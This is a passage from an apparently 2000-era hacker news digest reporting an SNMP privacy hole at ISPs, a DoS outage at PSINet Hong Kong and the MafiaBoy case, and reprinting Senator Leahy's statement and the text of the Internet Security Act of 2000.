making a comeback.
According to a bug-tracking group, so-called greyhat hackers say they have
developed a Perl script that can quietly extract subscribers' phone
numbers and log-in names directly off an ISP's terminal servers using the
Simple Network Management Protocol (SNMP).
Philadelphia-based Philtered.Net is an online community that pursues their
own venue of security-related technical projects. One of the groups
hackers, who uses the handle "Lumpy," said an unauthorized person, armed
with the script and an Internet user's IP address, can easily query a
database on the ISPs access server.
According to Lumpy, it's easy to call the management information base of
an ISPs access server and use standard SNMP commands to transform an
anonymous IP address into the real-world coordinates of a live person.
"People usually think that their IP address is as far as a hacker could go
to find out who they are," Lumpy said. "But a hacker has the ability to
find out who they are through a server directory to discover a person's
home phone numbers and full address."
Lumpy also works as a security consultant and authored the script for
probing SNMP information. He recently posted the information and the
script on the Bugtraq mailing list.
Lumpy said three major ISPs were vulnerable to the attack, but after being
notified the firms took action and properly locked down their servers to
prevent SNMP access. Lumpy also claims that some ISPs have their servers
configured to allow write access permissions to their MIBs and that he's
been able to force dial-up users offline.
Jeff Case, president of SNMP.com, a Tennessee-based network
management-consulting firm, said the unsecured nature of older versions of
SNMP is common knowledge.
"The first version of SNMP is not secure and is subject to these sorts of
attacks," Case said. "We've know about that since 1988 and a new version
of SNMP was made available in 1998. It's been deployed to plug-up the
security holes."
But Lumpy of Philtered.net said that most ISPs could prevent unauthorized
access to their MIBs by properly configuring the hardware when technicians
initially set up a network.
"The reason these holes exists is because people have not bothered to read
the manual where it says in big letters 'change your community names and
block off access to SNMP,' but some ISPs aren't wasting time reading
manuals so this is what happens."
ISPs that want to determine if a SNMP privacy hole exists on their
networks can check out the BugTraq advisory at SecurityFocus.com in order
to tighten-up access to their networks.
@HWA
92.0 [HNN] Internet Security Act of 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Weld Pond
Senator Patrick Leahy has introduced into the Senate the Internet
Security Act of 2000. The bill will give more leeway to law
enforcement to use pen registers and trap and trace devices, remove
the 'loophole' that prevents officers from from monitoring an
innocent-host computer without a wiretap order and contains provisions
for equipment forfeiture. (This may be a little over reaction, seems
like a lot of power granted law enforcement.)
S 2430 - via Cryptome
http://cryptome.org/s2430is.txt
[Congressional Record: April 13, 2000 (Senate)]
[Page S2729-S2771]
From the Congressional Record Online via GPO Access [wais.access.gpo.gov]
[DOCID:cr13ap00pt2-155]
STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS
[Excerpt]
By Mr. LEAHY:
S. 2430. A bill to combat computer hacking through enhanced law
enforcement and to protect the privacy and constitutional rights of
Americans, and for other purposes; to the Committee on the Judiciary.
Internet Security Act of 2000
Mr. LEAHY. Mr. President, as we head into the twenty-first century,
computer-related crime is one of the greatest challenges facing law
enforcement. Many of our critical infrastructures and our government
depend upon the reliability and security of complex computer systems.
We need to make sure that these essential systems are protected from
all forms of attack. The legislation I am introducing today will help
law enforcement investigate and prosecute those who jeopardize the
integrity of our computer systems and the Internet.
Whether we work in the private sector or in government, we negotiate
daily through a variety of security checkpoints designed to protect
ourselves from being victimized by crime or targeted by terrorists. For
instance, congressional buildings like this one use cement pillars
placed at entrances, photo identification cards, metal detectors, x-ray
scanners, and security guards to protect the physical space. These
security steps and others have become ubiquitous in the private sector
as well.
Yet all these physical barriers can be circumvented using the wires
that run into every building to support the computers and computer
networks that are the mainstay of how we communicate and do business.
This plain fact was amply demonstrated by the recent hacker attacks on
E-Trade, ZDNet, Datek, Yahoo, eBay, Amazon.com and other Internet
sites. These attacks raise serious questions about Internet security--
questions that we need to answer to ensure the long-term stability of
electronic commerce. More importantly, a well-focused and more malign
cyber-attack on computer networks that support telecommunications,
transportation, water supply, banking, electrical power and other
critical infrastructure systems could wreak havoc on our national
economy or even jeopardize our national defense. We have learned that
even law enforcement is not immune. Just recently we learned of a
denial of service attack successfully perpetrated against a FBI web
site, shutting down that site for several hours.
The cybercrime problem is growing. The reports of the CERT
Coordination Center (formerly called the ``Computer Emergency Response
Team''), which was established in 1988 to help the Internet community
detect and resolve computer security incidents, provide chilling
statistics on the vulnerabilities of the Internet and the scope of the
problem. Over the last decade, the number of reported computer security
incidents grew from 6 in 1988 to more than 8,000 in 1999. But that
alone does not reveal the scope of the problem. According to CERT's
most recent annual report, more than four million computer hosts were
affected by the computer security incidents in 1999 alone by damaging
computer viruses, with names like ``Melissa,'' ``Chernobyl,''
``ExploreZip,'' and by the other ways that remote intruders have found
to exploit system vulnerabilities. Even before the recent headline-
grabbing ``denial-of-service'' attacks, CERT documented that such
incidents ``grew at rate around 50% per year'' which was ``greater than
the rate of growth of Internet hosts.''
CERT has tracked recent trends in severe hacking incidents on the
Internet and made the following observations, First, hacking techniques
are getting more sophisticated. That means law enforcement is going to
have to get smarter too, and we need to give them the resources to do
this. Second, hackers have ``become increasingly difficult to locate
and identify.'' These criminals are operating in many different
locations and are using techniques that allow them to operate in
``nearly total obscurity.''
We have been aware of the vulnerabilities to terrorist attacks of our
computer networks for more than a decade. It became clear to me, when I
chaired a series of hearings in 1988 and 1989 by the Subcommittee on
Technology and the Law in the Senate Judiciary Committee on the subject
of high-tech terrorism and the threat of computer viruses, that merely
``hardening'' our physical space from potential attack would only
prompt committed criminals and terrorists to switch tactics and use new
technologies to reach vulnerable softer targets, such as our computer
systems and other critical infrastructures. The government has a
responsibility to work with those in the private sector to assess those
vulnerabilities and defend them. That means making sure our law
enforcement agencies have the tools they need, but also that the
government does not stand in the way of smart technical solutions to
defend our computer systems.
Targeting cybercrime with up-to-date criminal laws and tougher law
enforcement is only part of the solution. While criminal penalties may
deter some computer criminals, these laws usually come into play too
late, after the crime has been committed and the injury inflicted. We
should keep in mind the adage that the best defense is a good offense.
Americans and American firms must be encouraged to take preventive
measures to protect their computer information and systems. Just
recently, internet providers and companies such as Yahoo! and
Amazon.com Inc., and computer hardware companies such a Cisco Systems
Inc., proved successful at stemming attacks within hours thereby
limiting losses.
That is why, for years, I have advocated and sponsored legislation to
encourage the widespread use of strong encryption. Encryption is an
important tool in our arsenal to protect the security of our computer
information and networks. The Administration made enormous progress
earlier this year when it issued new regulations relaxing export
controls on strong encryption. Of course, encryption technology cannot
be the sole source of protection for our critical computer networks and
computer-based infrastructure, but we need to make sure the government
is encouraging--and not restraining--the use of strong encryption and
other technical solutions to protecting our computer systems.
Congress has responded again and again to help our law enforcement
agencies keep up with the challenges of new crimes being executed over
computer networks. In 1984, we passed the Computer Fraud and Abuse Act,
and its amendments, to criminalize conduct when carried out by means
of unauthorized access to a computer. In 1986, we passed the Electronic
Communications Privacy Act (ECPA), which I was proud to sponsor, to
criminalize tampering with electronic mail systems and remote data
processing systems and to protect the privacy of computer users. In the
104th Congress, Senators Kyl, Grassley, and I worked together to enact
the National Information Infrastructure Protection Act to increase
protection under federal criminal law for both government and private
computers, and to address an emerging problem of computer-age blackmail
in which a criminal threatens to harm or shut down a computer system
unless their extortion demands are met.
[[Page S2739]]
In this Congress, I have introduced a bill with Senator DeWine, the
Computer Crime Enforcement Act, S. 1314, to set up a $25 million grant
program within the U.S. Department of Justice for states to tap for
improved education, training, enforcement and prosecution of computer
crimes. All 50 states have now enacted tough computer crime control
laws. These state laws establish a firm groundwork for electronic
commerce and Internet security. Unfortunately, too many state and local
law enforcement agencies are struggling to afford the high cost of
training and equipment necessary for effective enforcement of their
state computer crime statutes. Our legislation, the Computer Crime
Enforcement Act, would help state and local law enforcement join the
fight to combat the worsening threats we face from computer crime.
Computer crime is a problem nationwide and in Vermont. I recently
released a survey on computer crime in Vermont. My office surveyed 54
law enforcement agencies in Vermont--43 police departments and 11
State's attorney offices--on their experience investigating and
prosecuting computer crimes. The survey found that more than half of
these Vermont law enforcement agencies encounter computer crime, with
many police departments and state's attorney offices handling 2 to 5
computer crimes per month.
Despite this documented need, far too many law enforcement agencies
in Vermont cannot afford the cost of policing against computer crimes.
Indeed, my survey found that 98% of the responding Vermont law
enforcement agencies do not have funds dedicated for use in computer
crime enforcement.
My survey also found that few law enforcement officers in Vermont are
properly trained in investigating computer crimes and analyzing cyber-
evidence. According to my survey, 83% of responding law enforcement
agencies in Vermont do not employ officers properly trained in computer
crime investigative techniques. Moreover, my survey found that 52% of
the law enforcement agencies that handle one or more computer crimes
per month cited their lack of training as a problem encountered during
investigations. Proper training is critical to ensuring success in the
fight against computer crime.
This bill will help our computer crime laws up to date as an
important backstop and deterrent. I believe that our current computer
crime laws can be enhanced and that the time to act is now. We should
pass legislation designed to improve our law enforcement efforts while
at the same time protecting the privacy rights of American citizens.
The bill I offer today will make it more efficient for law
enforcement to use tools that are already available--such as pen
registers and trap and trace devices--to track down computer criminals
expeditiously. It will ensure that law enforcement can investigate and
prosecute hacker attacks even when perpetrators use foreign-based
computers to facilitate their crimes. It will implement criminal
forfeiture provisions to ensure that cybercriminals are forced to
relinquish the tools of their trade upon conviction. It will also close
a current loophole in our wiretap laws that prevents a law enforcement
officer from monitoring an innocent-host computer with the consent of
the computer's owner and without a wiretap order to track down the
source of denial-of-service attacks. Finally, this legislation will
assist state and local police departments in their parallel efforts to
combat cybercrime, in recognition of the fact that this fight is not
just at the federal level.
The key provisions of the bill are:
Jurisdictional and Definitional Changes to the Computer Fraud and
Abuse Act: The Computer Fraud and Abuse Act, 18 U.S.C. Sec. 1030, is
the primary federal criminal statute prohibiting computer frauds and
hacking. This bill would amend the statute to clarify the appropriate
scope of federal jurisdiction. First, the bill adds a broad definition
of ``loss'' to the definitional section. Calculation of loss is
important both in determining whether the $5,000 jurisdictional hurdle
in the statute is met, and, at sentencing, in calculating the
appropriate guideline range and restitution amount.
Second, the bill amends the definition of ``protected computer,'' to
expressly include qualified computers even when they are physically
located outside of the United States. This clarification will preserve
the ability of the United States to assist in international hacking
cases. A ``Sense of Congress'' provision specifies that federal
jurisdiction is justified by the ``interconnected and interdependent
nature of computers used in interstate or foreign commerce.''
Finally, the bill expands the jurisdiction of the United States
Secret Service to encompass investigations of all violations of 18
U.S.C. Sec. 1030. Prior to the 1996 amendments to the Computer Fraud
and Abuse Act, the Secret Service was authorized to investigate any and
all violations of section 1030, pursuant to an agreement between the
Secretary of Treasury and the Attorney General. The 1996 amendments,
however, concentrated Secret Service jurisdiction on certain specified
subsections of section 1030. The current amendment would return full
jurisdiction to the Secret Service and would allow the Justice and
Treasury Departments to decide on the appropriate work-sharing balance
between the two.
Elimination of Mandatory Minimum Sentence for Certain Violations of
Computer Fraud and Abuse Act: Currently, a directive to the Sentencing
Commission requires that all violations, including misdemeanor
violations, of certain provisions of the Computer Fraud and Abuse Act
be punished with a term of imprisonment of at least six months. The
bill would change this directive to the Sentencing Commission so that
no such mandatory minimum would be required.
Additional Criminal Forfeiture Provisions: The bill adds a criminal
forfeiture provision to the Computer Fraud and Abuse Act, requiring
forfeiture of physical property used in or to facilitate the offense as
well as property derived from proceeds of the offense. It also
supplements the current forfeiture provision in 18 U.S.C. 2318, which
prohibits trafficking in, among other things, counterfeit computer
program documentation and packaging, to require the forfeiture of
replicators and other devices used in the production of such
counterfeit items.
Pen Registers and Trap and Trace Devices: The bill makes it easier
for law enforcement to use these investigative techniques in the area
of cybercrime, and institutes corresponding privacy protections. On the
law enforcement side, the bill gives nationwide effect to pen register
and trap and trace orders obtained by Government attorneys, thus
obviating the need to obtain identical orders in multiple federal
jurisdictions. It also clarifies that such devices can be used on all
electronic communication lines, not just telephone lines. On the
privacy side, the bill provides for greater judicial review of
applications for pen registers and trap and trace devices and
institutes a minimization requirement for the use of such devices. The
bill also amends the reporting requirements for applications for such
devices by specifying the information to be reported.
Denial of Service Investigations: Currently, a person whose computer
is accessed by a hacker as a means for the hacker to reach a third
computer cannot simply consent to law enforcement monitoring of his
computer. Instead, because this person is not technically a party to
the communication, law enforcement needs wiretap authorization under
Title III to conduct such monitoring. The bill will close this loophole
by explicitly permitting such monitoring without a wiretap if prior
consent is obtained from the person whose computer is being hacked
through and used to send ``harmful interference to a lawfully operating
computer system.''
Encryption Reporting: The bill directs the Attorney General to report
the number of wiretap orders in which encryption was encountered and
whether such encryption precluded law enforcement from obtaining the
plaintext of intercepted communications.
State and Local Computer Crime Enforcement: The bill directs the
Office of Federal Programs to make grants to assist State and local law
enforcement in the investigation and prosecution of computer crime.
Legislation must be balanced to protect our privacy and other
constitutional rights. I am a strong proponent
[[Page S2740]]
of the Internet and a defender of our constitutional rights to speak
freely and to keep private our confidential affairs from either private
sector snoops or unreasonable government searches. These principles can
be respected at the same time we hold accountable those malicious
mischief makers and digital graffiti sprayers, who use computers to
damage or destroy the property of others. I have seen Congress react
reflexively in the past to address concerns over anti-social behavior
on the Internet with legislative proposals that would do more harm than
good. A good example of this is the Communications Decency Act, which
the Supreme Court declared unconstitutional. We must make sure that our
legislative efforts are precisely targeted on stopping destructive acts
and that we avoid scattershot proposals that would threaten, rather
than foster, electronic commerce and sacrifice, rather than promote,
our constitutional rights.
Technology has ushered in a new age filled with unlimited potential
for commerce and communications. But the Internet age has also ushered
in new challenges for federal, state and local law enforcement
officials. Congress and the Administration need to work together to
meet these new challenges while preserving the benefits of our new era.
The legislation I offer today is a step in that direction.
Mr. President, I ask unanimous consent that the text of the bill be
printed in the Record.
There being no objection, the bill was ordered to be printed in the
Record, as follows:
S. 2430
Be it enacted by the Senate and House of Representatives of
the United States of America in Congress assembled,
SECTION 1. SHORT TITLE.
This Act may be cited as the ``Internet Security Act of
2000''.
SEC. 2. AMENDMENTS TO THE COMPUTER FRAUD AND ABUSE ACT.
Section 1030 of title 18, United States Code, is amended--
(1) in subsection (a)--
(A) in paragraph (5)--
(i) by inserting ``(i)'' after ``(A)'' and redesignating
subparagraphs (B) and (C) as clauses (ii) and (iii),
respectively;
(ii) in subparagraph (A)(iii), as redesignated, by adding
``and'' at the end; and
(iii) by adding at the end the following:
``(B) the conduct described in clause (i), (ii), or (iii)
of subparagraph (A)--
``(i) caused loss aggregating at least $5,000 in value
during a 1-year period to 1 or more individuals;
``(ii) modified or impaired, or potentially modified or
impaired, the medical examination, diagnosis, treatment, or
care of 1 or more individuals;
``(iii) caused physical injury to any person; or
``(iv) threatened public health or safety;''; and
(B) in paragraph (6), by adding ``or'' at the end;
(2) in subsection (c)--
(A) in paragraph (2)--
(i) in subparagraph (A), by striking ``and'' at the end;
and
(ii) in subparagraph (B), by inserting ``or an attempted
offense'' after ``in the case of an offense''; and
(B) by adding at the end the following:
``(4) forfeiture to the United States in accordance with
subsection (i) of the interest of the offender in--
``(A) any personal property used or intended to be used to
commit or to facilitate the commission of the offense; and
``(B) any property, real or personal, that constitutes or
that is derived from proceeds traceable to any violation of
this section.'';
(3) in subsection (d)--
(A) by striking ``subsections (a)(2)(A), (a)(2)(B), (a)(3),
(a)(4), (a)(5), and (a)(6) of''; and
(B) by striking ``which shall be entered into by'' and
inserting ``between'';
(4) in subsection (e)--
(A) in paragraph (2)(B), by inserting ``, including
computers located outside the United States'' before the
semicolon;
(B) in paragraph (4), by striking the period at the end and
inserting a semicolon;
(C) in paragraph (7), by striking ``and'' at the end;
(D) in paragraph (8), by striking ``, that'' and all that
follows through ``; and'' and inserting a semicolon;
(E) in paragraph (9), by striking the period at the end and
inserting ``; and''; and
(F) by adding at the end the following:
``(10) the term `loss' includes--
``(A) the reasonable costs to any victim of--
``(i) responding to the offense;
``(ii) conducting a damage assessment; and
``(iii) restoring the system and data to their condition
prior to the offense; and
``(B) any lost revenue or costs incurred by the victim as a
result of interruption of service.'';
(5) in subsection (g), by striking ``Damages for violations
involving damage as defined in subsection (c)(8)(A)'' and
inserting ``losses specified in subsection (a)(5)(B)(i)'';
and
(6) by adding at the end the following:
``(i) Provisions Governing Forfeiture.--Property subject to
forfeiture under this section, any seizure and disposition
thereof, and any administrative or judicial proceeding in
relation thereto, shall be governed by subsection (c) and
subsections (e) through (p) of section 413 of the
Comprehensive Drug Abuse Prevention and Control Act of 1970
(21 U.S.C. 853).''.
SEC. 3. SENSE OF CONGRESS.
It is the sense of Congress that--
(1) acts that damage or attempt to damage computers used in
the delivery of critical infrastructure services such as
telecommunications, energy, transportation, banking and
financial services, and emergency and government services
pose a serious threat to public health and safety and cause
or have the potential to cause losses to victims that include
costs of responding to offenses, conducting damage
assessments, and restoring systems and data to their
condition prior to the offense, as well as lost revenue and
costs incurred as a result of interruptions of service; and
(2) the Federal Government should have jurisdiction to
investigate acts affecting protected computers, as defined in
section 1030(e)(2)(B) of title 18, United States Code, as
amended by this Act, even if the effects of such acts occur
wholly outside the United States, as in such instances a
sufficient Federal nexus is conferred through the
interconnected and interdependent nature of computers used in
interstate or foreign commerce or communication.
SEC. 4. MODIFICATION OF SENTENCING COMMISSION DIRECTIVE.
Pursuant to its authority under section 994(p) of title 28,
United States Code, the United States Sentencing Commission
shall amend the Federal sentencing guidelines to ensure that
any individual convicted of a violation of paragraph (4) or
(5) of section 1030(a) of title 18, United States Code, can
be subjected to appropriate penalties, without regard to any
mandatory minimum term of imprisonment.
SEC. 5. FORFEITURE OF DEVICES USED IN COMPUTER SOFTWARE
COUNTERFEITING.
Section 2318(d) of title 18, United States Code, is amended
by--
(1) inserting ``(1)'' before ``When'';
(2) inserting ``, and any replicator or other device or
thing used to copy or produce the computer program or other
item to which the counterfeit label was affixed, or was
intended to be affixed'' before the period; and
(3) by adding at the end the following:
``(2) The forfeiture of property under this section,
including any seizure and disposition of the property, and
any related judicial or administrative proceeding, shall be
governed by the provisions of section 413 (other than
subsection (d) of that section) of the Comprehensive Drug
Abuse Prevention and Control Act of 1970 (21 U.S.C. 853).''.
SEC. 6. CONFORMING AMENDMENT.
Section 492 of title 18, United States Code, is amended by
striking ``or 1720,'' and inserting ``, 1720, or 2318''.
SEC. 7. PEN REGISTERS AND TRAP AND TRACE DEVICES.
Section 3123 of title 18, United States Code is amended--
(1) by striking subsection (a) and inserting the following:
``(a) Issuance of Order.--
``(1) Requests from attorneys for the government.--Upon an
application made under section 3122(a)(1), the court may
enter an ex parte order authorizing the installation and use
of a pen register or a trap and trace device if the court
finds, based on the certification by the attorney for the
Government, that the information likely to be obtained by
such installation and use is relevant to an ongoing criminal
investigation. Such order shall apply to any entity providing
wire or electronic communication service in the United States
whose assistance is necessary to effectuate the order.
``(2) Requests from state investigative or law enforcement
officers.--Upon an application made under section 3122(a)(2),
the court may enter an ex parte order authorizing the
installation and use of a pen register or a trap and trace
device within the jurisdiction of the court, if the court
finds, based on the certification by the State law
enforcement or investigative officer, that the information
likely to be obtained by such installation and use is
relevant to an ongoing criminal investigation.''; and
(2) in subsection (b)--
(A) in paragraph (1)--
(i) in subparagraph (C), by inserting ``authorized under
subsection (a)(2)'' after ``in the case of a trap and trace
device''; and
(ii) in subparagraph (D), by striking ``and'' at the end;
(B) in paragraph (2), by striking the period at the end and
inserting ``; and''; and
(C) by adding at the end the following:
``(3) shall direct that the use of the pen register or trap
and trace device be conducted in such a way as to minimize
the recording or decoding of any electronic or other impulses
that are not related to the dialing and signaling information
utilized in processing by the service provider upon whom the
order is served.''.
SEC. 8. TECHNICAL AMENDMENTS TO PEN REGISTER AND TRAP AND
TRACE PROVISIONS.
(a) Issuance of an Order.--Section 3123 of title 18, United
States Code, is amended--
(1) by inserting ``or other facility'' after ``line'' each
place that term appears;
[[Page S2741]]
(2) by inserting ``or applied'' after ``attached'' each
place that term appears;
(3) in subsection (b)(1)(C), by inserting ``or other
identifier'' after ``the number''; and
(4) in subsection (d)(2), by striking ``who has been
ordered by the court'' and inserting ``who is obligated by
the order''.
(b) Definitions.--Section 3127 of title 18, United States
Code is amended--
(1) by striking paragraph (3) and inserting the following:
``(3) the term `pen register'--
``(A) means a device or process that records or decodes
electronic or other impulses that identify the telephone
numbers or electronic address dialed or otherwise transmitted
by an instrument or facility from which a wire or electronic
communication is transmitted and used for purposes of
identifying the destination or termination of such
communication by the service provider upon which the order is
served; and
``(B) does not include any device or process used by a
provider or customer of a wire or electronic communication
service for billing, or recording as an incident to billing,
for communications services provided by such provider or any
device or process by a provider or customer of a wire
communication service for cost accounting or other like
purposes in the ordinary course of its business;''; and
(2) in paragraph (4)--
(A) by inserting ``or process'' after ``means a device'';
(B) by inserting ``or other identifier'' after ``number'';
and
(C) by striking ``or device'' and inserting ``or other
facility''.
SEC. 9. PEN REGISTER AND TRAP AND TRACE REPORTS.
Section 3126 of title 18, United States Code, is amended by
inserting before the period at the end the following: ``,
which report shall include information concerning--
``(1) the period of interceptions authorized by the order,
and the number and duration of any extensions of the order;
``(2) the offense specified in the order or application, or
extension of an order;
``(3) the number of investigations involved;
``(4) the number and nature of the facilities affected; and
``(5) the identity, including district, of the applying
investigative or law enforcement agency making the
application and the person authorizing the order''.
SEC. 10. ENHANCED DENIAL OF SERVICE INVESTIGATIONS.
Section 2511(2)(c) of title 18, United States Code, is
amended to read as follows:
``(c)(i) It shall not be unlawful under this chapter for a
person acting under color of law to intercept a wire, oral,
or electronic communication, if such person is a party to the
communication or 1 of the parties to the communication has
given prior consent to such interception.
``(ii) It shall not be unlawful under this chapter for a
person acting under color of law to intercept a wire or
electronic communication, if--
``(I) the transmission of the wire or electronic
communication is causing harmful interference to a lawfully
operating computer system;
``(II) any person who is not a provider of service to the
public and who is authorized to use the facility from which
the wire or electronic communication is to be intercepted has
given prior consent to the interception; and
``(III) the interception is conducted only to the extent
necessary to identify the source of the harmful interference
described in subclause (I).''.
SEC. 11. ENCRYPTION REPORTING REQUIREMENTS.
Section 2519(2)(b) of title 18, United States Code, is
amended by striking ``and (iv)'' and inserting ``(iv) the
number of orders in which encryption was encountered and
whether such encryption prevented law enforcement from
obtaining the plain text of communications intercepted
pursuant to such order, and (v)''.
SEC. 12. STATE AND LOCAL COMPUTER CRIME ENFORCEMENT.
(a) In General.--Subject to the availability of amounts
provided in advance in appropriations Acts, the Assistant
Attorney General for the Office of Justice Programs of the
Department of Justice shall make a grant to each State, which
shall be used by the State, in conjunction with units of
local government, State and local courts, other States, or
combinations thereof, to--
(1) assist State and local law enforcement in enforcing
State and local criminal laws relating to computer crime;
(2) assist State and local law enforcement in educating the
public to prevent and identify computer crime;
(3) assist in educating and training State and local law
enforcement officers and prosecutors to conduct
investigations and forensic analyses of evidence and
prosecutions of computer crime;
(4) assist State and local law enforcement officers and
prosecutors in acquiring computer and other equipment to
conduct investigations and forensic analysis of evidence of
computer crimes; and
(5) facilitate and promote the sharing of Federal law
enforcement expertise and information about the
investigation, analysis, and prosecution of computer crimes
with State and local law enforcement officers and
prosecutors, including the use of multijurisdictional task
forces.
(b) Use of Grant Amounts.--Grants under this section may be
used to establish and develop programs to--
(1) assist State and local law enforcement agencies in
enforcing State and local criminal laws relating to computer
crime;
(2) assist State and local law enforcement agencies in
educating the public to prevent and identify computer crime;
(3) educate and train State and local law enforcement
officers and prosecutors to conduct investigations and
forensic analyses of evidence and prosecutions of computer
crime;
(4) assist State and local law enforcement officers and
prosecutors in acquiring computer and other equipment to
conduct investigations and forensic analysis of evidence of
computer crimes; and
(5) facilitate and promote the sharing of Federal law
enforcement expertise and information about the
investigation, analysis, and prosecution of computer crimes
with State and local law enforcement officers and
prosecutors, including the use of multijurisdictional task
forces.
(c) Assurances.--To be eligible to receive a grant under
this section, a State shall provide assurances to the
Attorney General that the State--
(1) has in effect laws that penalize computer crime, such
as penal laws prohibiting--
(A) fraudulent schemes executed by means of a computer
system or network;
(B) the unlawful damaging, destroying, altering, deleting,
removing of computer software, or data contained in a
computer, computer system, computer program, or computer
network; or
(C) the unlawful interference with the operation of or
denial of access to a computer, computer program, computer
system, or computer network;
(2) an assessment of the State and local resource needs,
including criminal justice resources being devoted to the
investigation and enforcement of computer crime laws; and
(3) a plan for coordinating the programs funded under this
section with other federally funded technical assistant and
training programs, including directly funded local programs
such as the Local Law Enforcement Block Grant program
(described under the heading ``Violent Crime Reduction
Programs, State and Local Law Enforcement Assistance'' of the
Departments of Commerce, Justice, and State, the Judiciary,
and Related Agencies Appropriations Act, 1998 (Public Law
105-119)).
(d) Matching Funds.--The Federal share of a grant received
under this section may not exceed 90 percent of the total
cost of a program or proposal funded under this section
unless the Attorney General waives, wholly or in part, the
requirements of this subsection.
(e) Authorization of Appropriations.--
(1) In general.--There is authorized to be appropriated to
carry out this section $25,000,000 for each of fiscal years
2000 through 2003.
(2) Limitations.--Of the amount made available to carry out
this section in any fiscal year not more than 3 percent may
be used by the Attorney General for salaries and
administrative expenses.
(3) Minimum amount.--Unless all eligible applications
submitted by any State or units of local government within a
State for a grant under this section have been funded, the
State, together with grantees within the State (other than
Indian tribes), shall be allocated in each fiscal year under
this section not less than 0.75 percent of the total amount
appropriated in the fiscal year for grants pursuant to this
section, except that the United States Virgin Islands,
American Samoa, Guam, and the Northern Mariana Islands each
shall be allocated 0.25 percent.
(f) Grants to Indian Tribes.--Notwithstanding any other
provision of this section, the Attorney General may use
amounts made available under this section to make grants to
Indian tribes for use in accordance with this section.
______
@HWA
93.0 [HNN] PSINet Hit with DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopalyse
A denial-of-service attack on PSINet Hong Kong on Wednesday disabled
the Internet service provider's Web-hosting servers for most of the
day, leaving many of its dotcom customers without e-mail and Web
sites. However, more than a day after the attack took place, the ISP
was still unable to determine whether it was the result of an outside
attacker or an internal blunder.
Technology Post
http://www.technologypost.com/internet/Daily/20000420194747504.asp?Section
Published on Thursday, April 20, 2000 INTERNET
PSINet hit by denial-of-service attack NEIL ART
--------------------------------------------------------------------------
------ Updated at 8.55pm: A denial-of-service attack on PSINet Hong Kong
on Wednesday disabled the Internet service provider's Web-hosting servers
for most of the day, leaving many of its dotcom customers without e-mail
and Web sites. However, more than a day after the attack took place, the
ISP was still unable to determine whether it was the result of an outside
hacker or an internal blunder.
William Kwan, president PSINet Hong Kong, said "unusual amounts of traffic
were generated by a desktop computer through the network", which might
have been caused by a programmer checking data traffic.
A denial-of-service attack is one in which a large volume, or packets, of
information are continually sent to a network server, disrupting network
connectivity because the server is unable to answer the demand.
"We don't know what caused the large volume of traffic," Mr Kwan said,
adding that the company had not contacted the police.
The attack started around 1.45pm on Wednesday, PSINet said, adding that
its leased-line network was partially restored in two hours and fully
restored by 7pm.
However, PSINet's dial-up network was still experiencing problems as late
as midnight, according to some of its customers.
Clients said their e-mail services and Web sites were down for most of the
day.
Dennis Skouse, managing director Spin Design and Advertising, said he came
to work around 9.30am to find his e-mail box missing. His computer gave
him a message that it could not locate the server.
He said his company "absolutely relied" on e-mail to "send PDF [portable
document format] files all over the place for [client] approval".
Mr Skouse said that throughout the day he was sporadically able to access
and check his e-mail. He said it was bad timing because many people were
leaving Hong Kong for the Easter holiday and wanted to finalise designs
with his firm before doing so.
David Croasdale, business director Newell Public Relations, said the
company was off-line from mid-morning for most of the day.
"We rely a lot on e-mail to keep in touch with clients," he said. "Our
clients rely on Newell to get their messages out."
Newell founder Stuart Newell said: "The whole office felt completely out
of touch. Potentially, it could have a serious effect on business in Hong
Kong."
Advedi, a Web and e-mail services company, was also adversely affected, as
were many of its clients, said Patrick Ceulemans, co-founder and director
of Advedi.
"Basically, we are out of business as well as our clients," he said,
adding, however, that his company was able to re-establish service with
another ISP.
"It was down for at least two hours that I know of," said Mr Ceulemans.
"It is unfortunate, but this is life."
He said he had e-mailed PSINet, but it had not responded.
"There should be some system in place to notify clients, so that they in
turn may take appropriate action," said Mr Ceulemans.
PSINet declined to comment on the disruption to its services when
contacted on Wednesday night, but issued a brief statement on Thursday.
It said the disruption of service was due to PSINet's sharing of an
internal PC network with that of the customer network.
"Remedial actions have been taken immediately by relocating and
reconfiguring our internal network. We will do our utmost to minimise
similar problems from occurring in the future."
@HWA
94.0 [HNN] Satellite Jammer Plans on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Odin
With $7500 in spare parts and plans found on the Internet a US Air
Force team built what they say can successfully jam satellite signals.
Unfortunately they didn't give the effective range of the jamming
device or the URL to the plans.
New Scientist
http://www.newscientist.com/news/news_223528.html
( Shit, not found, anyone have this or any other details email me! - Ed)
@HWA
95.0 [HNN] GNIT Vulnerability Scanner Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by m0nk
The GNIT vulnerability Scanner has been almost completely redesigned
from the ground up to perform a scan for open ports. Many new
functions have been added to this new release of GNIT, including the
great new feature of a custom generated html output after a scan has
been run. Only for windows NT or 2000.
ellicit.org
http://security.ellicit.org
@HWA
96.0 [HNN] Free MafiaBoy
~~~~~~~~~~~~~~~~~~~
contributed by Bigfoot
Someone has set up a 'Free MafiaBoy' web site. Free MafiaBoy
http://www.geocities.com/freemafiaboy/
@HWA
97.0 [HNN] MafiaBoy News Roundup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by ATKeiper and TwiLyght
While the saga of Elian Gonzalez played out in the popular media over
the weekend the tech reporters were busy trying to find a new angle on
the MafiaBoy arrest last week. MafiaBoy has been charged in Canada
with initiating a denial of service attack against CNN.
MafiaBoy's lawyer has said that they expect a long, complex and
technical trial. (Hopefully this means that he will not be pleading
out.)
Washington Post
Canadian police said on Saturday they had charged MafiaBoy's father of
conspiring with another man to commit assault. Evidence for the
charges was gathered by using the wiretaps originally placed to gather
evidence on the boy.
Reuters - via Go2net
The Free MafiaBoy web site has supposedly been threatened with a
lawsuit by the lawyers for relatives of Michael Lyle. Michael Lyle
claims to have had IRC conversations with MafiaBoy prior to his
arrest.
Free MafiaBoy
The Toronto Star ran a rather interesting political cartoon regarding
MafiaBoy yesterday.
The Toronto Star
http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html
http://www.go2net.com/headlines/general/20000422/186850.html
http://www.geocities.com/freemafiaboy/
http://www.thestar.com/thestar/back_issues/ED20000423/opinion/20000423NEW02x_ED-CARTOON.html
@HWA
98.0 [HNN] Members of HV2k Raided
